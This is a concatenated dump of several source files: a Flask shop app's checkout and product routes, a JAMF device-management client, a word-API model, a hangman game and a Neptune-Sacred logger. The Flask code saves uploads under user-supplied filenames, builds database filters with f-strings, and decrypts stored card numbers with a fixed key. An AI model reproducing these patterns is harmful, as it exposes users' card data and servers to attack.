cart_form = forms.CartForm(request.form)\n\n while len(cart_form.product_quantity) != len(cart[0]):\n for product_id in cart[0]:\n cart_form.product_quantity.append_entry(cart[0][product_id])\n\n if request.method == \"POST\" and cart_form.validate():\n quantity = cart_form.product_quantity.data\n index = 0\n\n for product_id in product:\n product[product_id] = int(quantity[index])\n index += 1\n\n cart[0] = product\n session[\"cart\"] = cart\n return redirect(url_for(\"checkout\"))\n\n return render_template(\n \"cart.html\", len=len, cart=product_list, form=cart_form\n )\n except:\n flash(\"An error has occurred\")\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/checkout\", methods=[\"GET\", \"POST\"])\n@login_required\ndef checkout():\n checkout_form = forms.Checkout(request.form)\n user = User.query.filter_by(id=current_user.id).first()\n user = SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {current_user.id}\"\n )[0]\n credit_cards = user.credit_cards\n addresses = user.addresses\n key = aes.get_fixed_key()\n card_list = []\n\n for credit_card in credit_cards:\n card = aes.decrypt(key, credit_card.card_number, credit_card.iv).decode(\n \"utf8\"\n )\n card_list.append(\"Card \" + card)\n\n checkout_form.credit_card.choices = card_list\n address_list = [\n (addresses, \"%s\" % (addresses[i].address))\n for i in range(len(addresses))\n ]\n\n checkout_form.address.choices = address_list\n cart = session[\"cart\"]\n products = cart[0]\n product_list = []\n product_quantity = []\n\n for product_id in products:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n product_list.append(product)\n product_quantity.append(products[product_id])\n\n if request.method == \"POST\":\n card = \"\"\n order_product = \"\"\n\n for credit_card in credit_cards:\n if str(credit_card) == checkout_form.credit_card.data:\n card = credit_card\n break\n\n order = Orders(user_id=current_user.id)\n created_order = SecureDB.create(model=\"Orders\", object_=order)\n\n if any(\n product_quantity[i] > product.quantity\n for i, product in enumerate(product_list)\n ):\n flash(\"There is not enough stock\", \"warning\")\n return redirect(url_for(\"cart\"))\n\n for i, product in enumerate(product_list):\n order_product = OrderProduct(\n order_id=created_order.order_id,\n product_id=product.product_id,\n quantity=product_quantity[i],\n product=product,\n )\n SecureDB.create(model=\"OrderProduct\", object_=order_product)\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product.product_id}\",\n values={\"quantity\": product.quantity - product_quantity[i]},\n )\n\n flash(\"Order successfully added\", \"success\")\n return redirect(url_for(\"index\"))\n\n return render_template(\n \"checkout.html\",\n form=checkout_form,\n cart=product_list,\n len=len,\n product_quantity=product_quantity,\n )\n\n\n@app.route(\"/products\", methods=[\"GET\"])\ndef get_products():\n return redirect(\"admin\")\n\n\n@app.route(\"/products/new\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef add_product():\n form = forms.AddProductForm(\n CombinedMultiDict((request.files, request.form))\n )\n\n if request.method == \"POST\" and form.validate():\n if request.files:\n image = request.files[form.image.name]\n print(image)\n image.save(os.path.join(\"static/images\", image.filename))\n print(os.path.join(\"static/images\", image.filename))\n filename = \"images/%s\" % image.filename\n\n product = Product(\n 
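# The @restricted(access_level=...) decorator applied to the admin and
# seller routes is defined elsewhere in the project and is not shown. A
# typical shape for such a role gate is sketched below; the policy table
# _REQUIRED_ROLE and its values are hypothetical, since the real mapping
# from "admin page"/"admin"/"seller" to role names is project-specific.
from functools import wraps

_REQUIRED_ROLE = {"admin page": "Staff", "admin": "Staff", "seller": "Staff"}  # hypothetical


def restricted_sketch(access_level):
    def decorator(view):
        @wraps(view)
        def wrapper(*args, **kwargs):
            role_names = {ur.role.name for ur in current_user.roles}
            if _REQUIRED_ROLE.get(access_level) not in role_names:
                abort(403)
            return view(*args, **kwargs)
        return wrapper
    return decorator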
product_name=form.product_name.data,\n description=form.product_description.data,\n image=filename,\n price=form.product_price.data,\n quantity=form.product_quantity.data,\n deleted=False,\n )\n created_product = SecureDB.create(model=\"Product\", object_=product)\n flash(f\"Product {form.product_name} added successfully\", \"success\")\n return redirect(\n url_for(\"product\", product_id=created_product.product_id)\n )\n\n return render_template(\"add-product.html\", form=form)\n\n\n@app.route(\"/products//update\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef update_product(product_id):\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n form = forms.AddProductForm(\n CombinedMultiDict((request.files, request.form))\n )\n\n if request.method == \"POST\" and form.validate():\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product_id}\",\n values={\n \"product_name\": form.product_name.data,\n \"description\": form.product_description.data,\n \"image\": form.image.data,\n \"price\": form.product_price.data,\n \"quantity\": form.product_quantity.data,\n },\n )\n flash(\"This product has been updated!\", \"success\")\n return redirect((url_for(\"get_products\")))\n\n if request.method == \"GET\":\n form.product_name.data = product.product_name\n form.product_description.data = product.description\n form.image.data = product.image\n form.product_price.data = product.price\n form.product_quantity.data = product.quantity\n\n return render_template(\n \"add-product.html\", legend=\"Update Product\", form=form\n )\n\n\n@app.route(\"/products//delete\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef delete_product(product_id):\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product_id}\",\n values={\"deleted\": True},\n )\n flash(\"Your product has been deleted!\", \"success\")\n return redirect(url_for(\"get_products\"))\n\n\n@app.route(\"/search\")\ndef search():\n query = request.args.get(\"q\")\n\n if query is None:\n search_results = []\n else:\n query = query.strip().lower()\n products = SecureDB.retrieve(\n model=\"Product\", filter_=\"Product.product_id > 0\"\n )\n search_results = [\n product\n for product in products\n if query in product.product_name.lower() and not product.deleted\n ]\n\n return render_template(\n \"search.html\", query=query, search_results=search_results\n )\n\n\n@app.after_request\ndef add_header(response):\n response.headers[\n \"Strict-Transport-Security\"\n ] = \"max-age=31536000; includeSubDomains\"\n response.headers[\"X-Content-Type-Options\"] = \"nosniff\"\n response.headers[\"X-Frame-Options\"] = \"SAMEORIGIN\"\n response.headers[\"X-XSS-Protection\"] = \"1; mode=block\"\n return response\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":33155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"547800101","text":"import requests\nimport time\nfrom urllib.parse import urljoin\nfrom datetime import datetime, timezone\nimport json\nimport pathlib\nfrom typing import Union\nfrom requests.auth import HTTPBasicAuth\nimport html\nimport xml.etree.ElementTree as ET\n\nAUTH_ENDPOINT = \"auth/tokens\"\nMOBILE_DEVICE_ENDPOINT = \"v1/mobile-devices\"\nMOBILE_DEVICE_PRESTAGE_ENDPOINT = 
\"v1/mobile-device-prestages\"\nSEARCH_DEVICE_ENDPOINT = \"v1/search-mobile-devices\"\nVALIDATION_ENDPOINT = \"auth/current\"\nINVALIDATE_ENDPOINT = \"auth/invalidateToken\"\nCLASSIC_ENDPOINT = \"/JSSResource\"\nCLASSIC_DEVICENAME_ENDPOINT = (\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/DeviceName\"\n)\nDEVICE_RENAMING_RESTRICTION_PROFILE_ID = 127\n\n\n\nclass PCJAMF:\n \"\"\"\n The PCJAMF class provides an interface to the Pine Crest JAMF server for mobile device management (MDM)\n\n Class Methods:\n available: checks to see if the server is accessible\n server (str): the protocol, url, and port of a JAMF server\n path (str): the path to the server. (optional)\n verify (str, bool): whether to verify SSL certificates. Set to a PEM CA store \n for custom validation. Set to False for self-signed certs\n\n Args:\n username: the username to use for authentication\n password: the password to use for authentication\n server: the JAMF server path, including protocol, fqdn, and port\n verify (str, bool): the path to a CA file for cert verification \n or False to disable SSL certificate verification\n\n \"\"\"\n\n jamf_api_root = \"/uapi/\"\n\n @classmethod\n def available(\n cls,\n server: str,\n path: str = \"v1/jamf-pro-server-url\",\n verify: Union[str, bool] = True,\n ) -> bool:\n \"\"\"\n checks to see if the provided jamf server is accessible\n \"\"\"\n\n cls.jamf_url = urljoin(server, cls.jamf_api_root)\n url = urljoin(cls.jamf_url, path)\n response = requests.get(url, verify=verify)\n print(f\"{url}: {response.status_code}\")\n return response.ok or response.status_code == 401\n\n def __init__(\n self, username: str, password: str, server: str, verify: Union[str, bool] = True\n ):\n self.jamf_server = server\n self.jamf_url = urljoin(self.jamf_server, self.jamf_api_root)\n self.session = requests.Session()\n self.session.verify = verify\n self.credentials = (username, password)\n self.session.headers.update({\"Accept\": \"application/json\"})\n self.token = None\n self.auth_expiration = None\n self.classic_session = requests.Session()\n self.classic_session.verify = verify\n self.classic_session.auth = HTTPBasicAuth(username, password)\n self.classic_session.headers.update({\"Accept\": \"application/xml\"})\n\n def __del__(self):\n if self.authenticated:\n self.invalidate()\n self.session.close()\n self.classic_session.close()\n\n def authenticate(self):\n \"\"\"\n Connect to the JAMF server, authenticate using existing credentials, and get an API token\n \"\"\"\n self.session.auth = self.credentials\n r = self.session.post(self._url(AUTH_ENDPOINT))\n if not r.ok:\n raise Exception(f\"Invalid status code found. 
({r.status_code})\")\n auth_data = r.json()\n self.token = auth_data[\"token\"]\n self.auth_expiration = datetime.fromtimestamp(auth_data[\"expires\"] / 1000)\n self.session.auth = None\n self.session.headers.update({\"Authorization\": f\"Bearer {self.token}\"})\n\n @property\n def authenticated(self):\n \"\"\"\n Indicates if the server object is currently authenticated\n \"\"\"\n return self.token and self.auth_expiration > datetime.now()\n\n def _url(self, endpoint):\n return urljoin(self.jamf_url, endpoint)\n\n def all_devices(self):\n r = self.session.get(self._url(MOBILE_DEVICE_ENDPOINT))\n return r.json()\n\n def search_devices(self, *, serial=None, name=None, udid=None, asset_tag=None):\n search_params = {\"pageNumber\": 0, \"pageSize\": 100}\n if not any((serial, name, udid, asset_tag)):\n raise Exception(\"You must provide at least one search term\")\n\n if name:\n search_params[\"name\"] = name \n if serial:\n search_params[\"serialNumber\"] = serial\n if udid:\n search_params[\"udid\"] = udid\n if asset_tag:\n search_params[\"assetTag\"] = asset_tag\n\n r = self.session.post(url=self._url(SEARCH_DEVICE_ENDPOINT), json=search_params)\n payload = r.json()\n if payload.get(\"totalCount\", 0) > 0:\n return payload[\"results\"]\n else:\n raise Exception(\n f\"No results found for query\\nserial: {serial}\\nid: {name}\\nudid:{udid}\"\n )\n\n def device(self, device_id, detail=False):\n url = self._url(f\"{MOBILE_DEVICE_ENDPOINT}/{device_id}\")\n if detail:\n url += \"/detail\"\n r = self.session.get(url)\n if r.status_code == 200:\n return r.json()\n\n def update_device_name(self, device_id, name):\n\n url = self._url(\n html.escape(f\"{CLASSIC_DEVICENAME_ENDPOINT}/{name}/id/{device_id}\")\n )\n cr = self.classic_session.post(url=url, data=\"\")\n if cr.status_code != 201:\n return \"Unable to push device name command\"\n\n return cr.text\n\n def wipe_device(self, device_id):\n\n url = self._url(\n html.escape(f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/EraseDevice/id/{device_id}\")\n )\n cr = self.classic_session.post(url=url, data=\"\")\n if cr.status_code != 201:\n return \"Unable to wipe device\"\n\n return cr.text\n\n def update_inventory(self, device_id: int) -> str:\n url = self._url(\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/UpdateInventory/id/{device_id}\"\n )\n cr = self.classic_session.post(url=url)\n if cr.status_code != 201:\n print(url)\n print(cr.text)\n print(cr.status_code)\n raise Exception(\"Unable to push device update inventory\")\n\n return cr.text\n \n def update_os(self, device_id: int, force_install: bool=True)->str:\n install_action = 2 if force_install else 1\n self.flush_mobile_device_commands(device_id=device_id)\n\n url = self._url(\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/ScheduleOSUpdate/{install_action}/id/{device_id}\"\n )\n cr = self.classic_session.post(url=url)\n if cr.status_code != 201:\n print(url)\n print(cr.text)\n print(cr.status_code)\n raise Exception(\"Unable to push device OS update\")\n\n return cr.text\n\n def clear_location_from_device(self, device_id):\n location = {'building': None,\n 'department': None,\n 'emailAddress': '',\n 'realName': '',\n 'position': '',\n 'phoneNumber': '',\n 'room': '',\n 'username': ''}\n return self.update_device(device_id, location=location)\n\n def delete_device(self, device_id):\n url = self._url(html.escape(f\"{CLASSIC_ENDPOINT}/mobiledevices/id/{device_id}\"))\n print(f\"deleting device {device_id}\")\n cr = self.classic_session.delete(url=url, data=\"\")\n if 
cr.status_code == 200:\n print(f\"Device {device_id} successfully deleted.\")\n return True\n else:\n print(url)\n print(cr.text)\n raise Exception(\"Unable to push device name command\")\n\n def device_flattened(self, device_id):\n device = {}\n extended_device_info = self.device(device_id=device_id, detail=True)\n device.update(\n {\n k: v\n for k, v in extended_device_info.items()\n if not isinstance(v, list) and not isinstance(v, dict)\n }\n )\n if \"location\" in extended_device_info:\n device.update(\n {\n f\"location_{k}\": v\n for k, v in extended_device_info[\"location\"].items()\n if not isinstance(v, dict) and not isinstance(v, list)\n }\n )\n device.update(\n {\n f\"location_{k}_name\": v[\"name\"]\n for k, v in extended_device_info[\"location\"].items()\n if isinstance(v, dict) or isinstance(v, list)\n }\n )\n if \"ios\" in extended_device_info:\n device.update(\n {\n k: v\n for k, v in extended_device_info[\"ios\"].items()\n if not isinstance(v, dict) and not isinstance(v, list)\n }\n )\n device[\"application_count\"] = len(\n extended_device_info[\"ios\"][\"applications\"]\n )\n device.update(\n {\n f\"network_{k}\": v\n for k, v in extended_device_info[\"ios\"][\"network\"].items()\n }\n )\n return device\n\n def validate(self):\n r = self.session.post(self._url(VALIDATION_ENDPOINT))\n return r.status_code == 200\n\n def invalidate(self):\n if not self.authenticated:\n return True\n r = self.session.post(self._url(INVALIDATE_ENDPOINT))\n if r.ok:\n del self.session.headers[\"Accept\"]\n del self.token\n del self.auth_expiration\n return bool(r.ok)\n\n def change_device_configuration_profile_exclusion(\n self, device_id: int, configuration_profile_id: int, exclude_device: bool = True\n ) -> bool:\n \"\"\"\n Add or remove a mobile device from a mobile device configuration profile exclusion list\n \"\"\"\n device = self.device(device_id=device_id)\n root = self.get_configuration_profile(configuration_profile_id)\n excluded_devices = root.findall(\".//exclusions/mobile_devices\")[0]\n excluded_ids = [\n elm.text for elm in excluded_devices.findall(\"./mobile_device/id\")\n ]\n if exclude_device and device_id not in excluded_ids:\n device_element = ET.SubElement(excluded_devices, \"mobile_device\")\n try:\n ET.SubElement(device_element, \"id\").text = str(device_id)\n ET.SubElement(device_element, \"name\").text = device[\"name\"]\n ET.SubElement(device_element, \"udid\").text = device[\"udid\"]\n ET.SubElement(device_element, \"wifi_mac_address\").text = device[\n \"wifiMacAddress\"\n ]\n except KeyError:\n raise Exception(f\"device was not properly formed. 
{device}\")\n elif not exclude_device:\n try:\n device_element = excluded_devices.findall(\n f\"./mobile_device/[id='{device_id}']\"\n )[0]\n excluded_devices.remove(device_element)\n except IndexError:\n return True # We don't really care if it's missing from the list\n else:\n return True\n return self.update_configuration_profile(root)\n\n def get_configuration_profile(\n self, configuration_profile_id: int\n ) -> ET.ElementTree:\n r = self.classic_session.get(\n f\"{self.jamf_server}JSSResource/mobiledeviceconfigurationprofiles/id/{configuration_profile_id}\"\n )\n return ET.fromstring(r.text)\n\n def update_configuration_profile(\n self, configuration_profile: ET.ElementTree\n ) -> bool:\n configuration_id = configuration_profile.findall(\"./general/id\")[0].text\n r = self.classic_session.put(\n f\"{self.jamf_server}JSSResource/mobiledeviceconfigurationprofiles/id/{configuration_id}\",\n ET.tostring(configuration_profile),\n )\n return r.status_code == 201\n\n def update_device(self, device_id, payload=None, **kwargs):\n if not payload:\n payload = kwargs\n r = self.session.patch(\n self._url(f\"{MOBILE_DEVICE_ENDPOINT}/{device_id}\"), json=payload\n )\n if not r.ok:\n print(f\"Error {r.status_code}: {r.text}\")\n return r.ok\n\n def set_device_room(self, device_id: int, room_name: str) -> dict:\n \"\"\"\n Method to retrieve a room location from JAMF\n \"\"\"\n return self.update_device(device_id, location={\"room\": room_name})\n\n def get_buildings(self) -> dict:\n return self.get_object_list(\"v1/buildings/\")[\"results\"]\n\n def get_building(self, building_name: str, strip_extra: bool = False):\n buildings = self.get_buildings()\n building = self.get_object_by_name(buildings, building_name)\n if strip_extra:\n building = self.strip_extra_location_information(building)\n return building\n\n def get_departments(self) -> dict:\n return self.get_object_list(\"v1/departments/\")\n\n def get_department(self, department_name: str, strip_extra: bool = True) -> dict:\n departments = self.get_departments()\n department = self.get_object_by_name(departments, department_name)\n if strip_extra:\n department = self.strip_extra_location_information(department)\n return department\n\n def add_device_to_prestage(self, prestage_id: int, device_id: int=None, serial_number: str=None):\n if device_id and not serial_number:\n serial_number = self.device(device_id)['serialNumber']\n current_serials, version_lock = self.get_prestage_serials_and_vlock(prestage_id)\n if serial_number in current_serials:\n return True\n else:\n current_serials.append(serial_number)\n return self.update_prestage_scope(prestage_id, current_serials, version_lock)\n\n def get_prestage_id_for_device(self, device_id: int):\n device_serial = self.device(device_id)['serialNumber']\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/scope\"\n return self.session.get(url=self._url(url)).json()['serialsByPrestageId'].get(device_serial)\n\n def get_prestage_serials_and_vlock(self, prestage_id: int):\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/{prestage_id}/scope\"\n r = self.session.get(url=self._url(url))\n payload = r.json()\n current_serials = [assignment['serialNumber'] for assignment in payload['assignments']]\n version_lock = payload['versionLock']\n return current_serials, version_lock\n\n def update_prestage_scope(self, prestage_id: int, serials: list, version_lock):\n url = f\"{MOBILE_DEVICE_PRESTAGE_ENDPOINT}/{prestage_id}/scope\"\n payload = {\"serialNumbers\": serials, \"versionLock\": version_lock}\n r = 
self.session.put(url=self._url(url), json=payload)\n if not r.ok:\n print(f\"Error {r.status_code}: {r.text}\")\n else:\n print(f\"Adding Prestage: {self._url(url)} with payload {payload}\")\n return r.ok\n\n def remove_device_from_prestage(self, device_id: int=None, serial_number: str=None):\n if device_id and not serial_number:\n device = self.device(device_id, True)\n serial_number = device['serialNumber']\n if not device_id and serial_number:\n device_id = self.search_devices(serial=serial_number)[0].get('id')\n prestage_id = self.get_prestage_id_for_device(device_id)\n if not prestage_id:\n return True\n current_serials, version_lock = self.get_prestage_serials_and_vlock(prestage_id)\n new_serials = [serial for serial in current_serials if serial != serial_number]\n return self.update_prestage_scope(prestage_id, new_serials, version_lock)\n\n @staticmethod\n def strip_extra_location_information(location: dict) -> dict:\n if location:\n return {\"id\": location[\"id\"], \"name\": location[\"name\"]}\n\n def get_sites(self) -> dict:\n return self.get_object_list(\"settings/sites\")\n\n def get_site(self, site_name: str, strip_extra: bool = False) -> dict:\n sites = self.get_sites()\n site = self.get_object_by_name(sites, site_name)\n if strip_extra:\n site = self.strip_extra_location_information(site)\n return site\n\n def get_object_list(self, path: str) -> list:\n r = self.session.get(self._url(path))\n if not r.raise_for_status():\n return r.json()\n\n def get_object_by_name(self, object_list, name) -> dict:\n return next((item for item in object_list if item[\"name\"] == name), None)\n\n def flush_mobile_device_commands(self, device_id, status=None):\n\n if not status:\n status = \"Pending+Failed\"\n\n if status not in (\"Pending\", \"Failed\", \"Pending+Failed\"):\n raise Exception(\"Invalid Status: {status}\")\n\n url = self._url(\n html.escape(\n f\"{CLASSIC_ENDPOINT}/commandflush/mobiledevices/id/{device_id}/status/{status}\"\n )\n )\n\n return self.classic_session.delete(\n url, headers={\"accept\": \"application/json\"}\n ).ok\n\n","sub_path":"pc_jamf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":17193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189440688","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2014 Wordnik, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nclass DetailsResponse:\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\"\"\"\n\n\n def __init__(self):\n self.swaggerTypes = {\n 'also': 'list[str]',\n 'antonyms': 'list[str]',\n 'definitions': 'list[Definition]',\n 'entails': 'list[str]',\n 'hasCategories': 'list[str]',\n 'hasInstances': 'list[str]',\n 'hasMembers': 'list[str]',\n 'hasParts': 'list[str]',\n 'hasSubstances': 'list[str]',\n 'hasTypes': 'list[str]',\n 'hasUsages': 'list[str]',\n 'inCategory': 'list[str]',\n 'inRegion': 'list[str]',\n 'instance_of': 'list[str]',\n 'memberOf': 'list[str]',\n 
'partOf': 'list[str]',\n 'pertainsTo': 'list[str]',\n 'regionOf': 'list[str]',\n 'similarTo': 'list[str]',\n 'substanceOf': 'list[str]',\n 'synonyms': 'list[str]',\n 'typeOf': 'list[str]',\n 'usageOf': 'list[str]'\n\n }\n\n\n #Phrases to which the original word belongs.\n self.also = None # list[str]\n #Words that have the opposite context of the original word.\n self.antonyms = None # list[str]\n #The meaning of the word, including it's part of speech.\n self.definitions = None # list[Definition]\n #Words that are implied by the original word. Usually used for verbs.\n self.entails = None # list[str]\n #Categories of the original word.\n self.hasCategories = None # list[str]\n #Words that are examples of the original word.\n self.hasInstances = None # list[str]\n #Words that belong to the group defined by the original word.\n self.hasMembers = None # list[str]\n #Words that are part of the original word. Also known as meronyms.\n self.hasParts = None # list[str]\n #Substances that are part of the original word.\n self.hasSubstances = None # list[str]\n #Words that are more specific than the original word. Also known as hyponyms.\n self.hasTypes = None # list[str]\n #Words that are examples of the domain the original word defines.\n self.hasUsages = None # list[str]\n #The domain category to which the original word belongs.\n self.inCategory = None # list[str]\n #Regions where the word is used.\n self.inRegion = None # list[str]\n #Words that the original word is an example of.\n self.instance_of = None # list[str]\n #A group to which the original word belongs.\n self.memberOf = None # list[str]\n #Partof\n self.partOf = None # list[str]\n #Words to which the original word is relevant\n self.pertainsTo = None # list[str]\n #A region where words are used.\n self.regionOf = None # list[str]\n #Words that similar to the original word, but are not synonyms.\n self.similarTo = None # list[str]\n #Substances to which the original word is a part of.\n self.substanceOf = None # list[str]\n #Words that can be interchanged for the original word in the same context.\n self.synonyms = None # list[str]\n #Words that are more generic than the original word. Also known as hypernyms.\n self.typeOf = None # list[str]\n #Words that the original word is a domain usage of.\n self.usageOf = None # list[str]\n \n","sub_path":"WordsAPI-python/WordsAPI/models/DetailsResponse.py","file_name":"DetailsResponse.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125775687","text":"###############################\n##### Hangman Game Runner #####\n##### by Chris Pyles #####\n###############################\n\nfrom board import *\nfrom secret import *\nfrom player import *\nfrom utils import *\nimport re\n\nclass Game:\n\t\"\"\"\n\tRuns a game of hangman.\n\t\"\"\"\n\tdef __init__(self):\n\t\tprint(\"\\n\\nWelcome to Hangman.\\nSecret Keeper, step up to the computer.\")\n\t\tprint(\"\\nAre you the Secret Keeper?\")\n\t\tsecret_keeper = input()\n\t\tif re.match(r\"[Yy][Ee]?[Ss]?\", secret_keeper):\n\t\t\tself.enter_secret()\n\t\telse:\n\t\t\tprint(\"\\nSorry, you're not the Secret Keeper. 
Go away.\")\n\t\t\tGame()\n\n\tdef enter_secret(self):\n\t\tprint(\"\\n\\nSecret Keeper, enter your secret word.\")\n\t\tword = input()\n\t\tself._secret = SecretWord(word)\n\t\tself.create_players()\n\n\tdef create_players(self):\n\t\tself._players = []\n\t\tmore_players, i = True, 0\n\t\twhile more_players:\n\t\t\tprint(\"\\n\\nEnter Player {}'s Name:\".format(i))\n\t\t\tname = input()\n\t\t\tself._players += [Player(name, i)]\n\t\t\ti += 1\n\t\t\tprint(\"\\nMore players?\")\n\t\t\tmore_players_question = input()\n\t\t\tif re.match(r\"[Yy][Ee]?[Ss]?\", more_players_question):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\tself.init_board()\n\n\tdef init_board(self):\n\t\tself._board = Board(self._secret, self._players)\n\t\tself.run_game()\n\n\tdef run_game(self):\n\t\ti = 0\n\t\twhile not self._board.is_completed():\n\t\t\tprint(\"\\n\\nHere is the current state of the board:\")\n\t\t\tprint(self._board.board())\n\n\t\t\tprint(\"\\nIt is {}'s turn.\".format(self._players[i]._name))\n\t\t\tprint(\"Enter your guess below.\")\n\t\t\tguess = input()\n\n\t\t\ttry:\n\t\t\t\tassert len(guess) == 1, \"Guess must be length 1\"\n\t\t\texcept AssertionError:\n\t\t\t\tprint(\"\\nYour guess must have length 1.\")\n\t\t\t\tcontinue\n\n\t\t\tself._board.guess(self._players[i], guess)\n\n\t\t\ti += 1\n\t\t\tif i == len(self._players):\n\t\t\t\ti = 0\n\n\t\tself._board.ending()","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379152852","text":"#\n# Copyright (c) 2021, Neptune Labs Sp. z o.o.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport warnings\n\nfrom sacred.dependencies import get_digest\nfrom sacred.observers import RunObserver\n\nfrom neptune_sacred import __version__\nfrom neptune_sacred.impl.utils import custom_flatten_dict\n\ntry:\n # neptune-client=0.9.0 package structure\n import neptune.new as neptune\n from neptune.new.internal.utils import verify_type\nexcept ImportError:\n # neptune-client=1.0.0 package structure\n import neptune\n from neptune.internal.utils import verify_type\n\nINTEGRATION_VERSION_KEY = 'source_code/integrations/neptune-sacred'\n\n\nclass NeptuneObserver(RunObserver):\n \"\"\"Logs sacred experiment data to Neptune.\n\n Sacred observer that logs experiment metadata to neptune.\n The experiment data can be accessed and shared via web UI or experiment API.\n\n Args:\n run(Run): Neptune _run.\n base_namespace(str): The namespace to save all metadata from sacred.\n\n Examples:\n Create sacred experiment:\n\n >>> from numpy.random import permutation\n >>> from sklearn import svm, datasets\n >>> from sacred import Experiment\n >>> ex = Experiment('iris_rbf_svm')\n\n Add Neptune observer:\n\n >>> from neptunecontrib.monitoring.sacred import NeptuneObserver\n >>> ex.observers.append(NeptuneObserver(api_token='YOUR_LONG_API_TOKEN',\n ... 
project_name='USER_NAME/PROJECT_NAME'))\n\n Run experiment:\n\n >>> @ex.config\n ... def cfg():\n ... C = 1.0\n ... gamma = 0.7\n\n >>> @ex.automain\n ... def _run(C, gamma, _run):\n ... iris = datasets.load_iris()\n ... per = permutation(iris.target.size)\n ... iris.data = iris.data[per]\n ... iris.target = iris.target[per]\n ... clf = svm.SVC(C, 'rbf', gamma=gamma)\n ... clf.fit(iris.data[:90],\n ... iris.target[:90])\n ... return clf.score(iris.data[90:],\n ... iris.target[90:])\n\n\n You may also want to check `sacred integration docs page` and `example experiment page`_.\n\n .. _sacred integration docs page:\n https://docs.neptune.ai/integrations-and-supported-tools/model-training/sacred\n .. _example experiment page:\n https://app.neptune.ai/prince.canuma/sacred-integration/e/SAC-59/all\n \"\"\"\n\n def __init__(self, run, base_namespace='experiment'):\n super(NeptuneObserver, self).__init__()\n self._run = run\n\n self.base_namespace = base_namespace\n self.resources = {}\n\n self._run[INTEGRATION_VERSION_KEY] = __version__\n\n def started_event(self, ex_info, command, host_info, start_time, config, meta_info, _id):\n self._run['sys/name'] = ex_info['name']\n self._run[self.base_namespace]['config'] = custom_flatten_dict(config)\n self._run[self.base_namespace]['sacred_config/sacred_id'] = _id\n self._run[self.base_namespace]['sacred_config/host_info'] = host_info\n self._run[self.base_namespace]['sacred_config/meta_info'] = custom_flatten_dict(meta_info)\n self._run[self.base_namespace]['sacred_config/experiment_info'] = custom_flatten_dict(ex_info)\n\n def completed_event(self, stop_time, result: dict):\n if result:\n for i, (k, v) in enumerate(result.items()):\n if isinstance(v, str):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'] = v\n elif isinstance(v, int) or isinstance(v, float):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'] = float(v)\n elif isinstance(v, object):\n self._run[self.base_namespace][f'logs/metrics/results/{k}'].upload(v)\n else:\n warnings.warn(\n f\"Logging results does not support type '{type(v)}' results. 
Ignoring this result\")\n\n def interrupted_event(self, interrupt_time, status):\n pass\n\n def failed_event(self, fail_time, fail_trace):\n pass\n\n def artifact_event(self, name, filename, metadata=None, content_type=None):\n filename = filename.rsplit('/', 1)[-1]\n self._run[self.base_namespace][f'io_files/artifacts/{filename}'].upload(name)\n\n def resource_event(self, filename):\n if filename not in self.resources:\n md5 = get_digest(filename)\n self.resources[filename] = md5\n\n self._run[self.base_namespace]['io_files/resources'] = list(self.resources.items())\n\n def log_metrics(self, metrics_by_name, info):\n for metric_name, metric_ptr in metrics_by_name.items():\n for step, value, timestamp in zip(\n metric_ptr[\"steps\"],\n metric_ptr[\"values\"],\n metric_ptr['timestamps']):\n self._run[self.base_namespace][f'logs/metrics/{metric_name}'].log(step=int(step), value=value,\n timestamp=timestamp.timestamp())\n","sub_path":"neptune_sacred/impl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609485311","text":"import math\n\nimport pygame\n\n\n\nclass 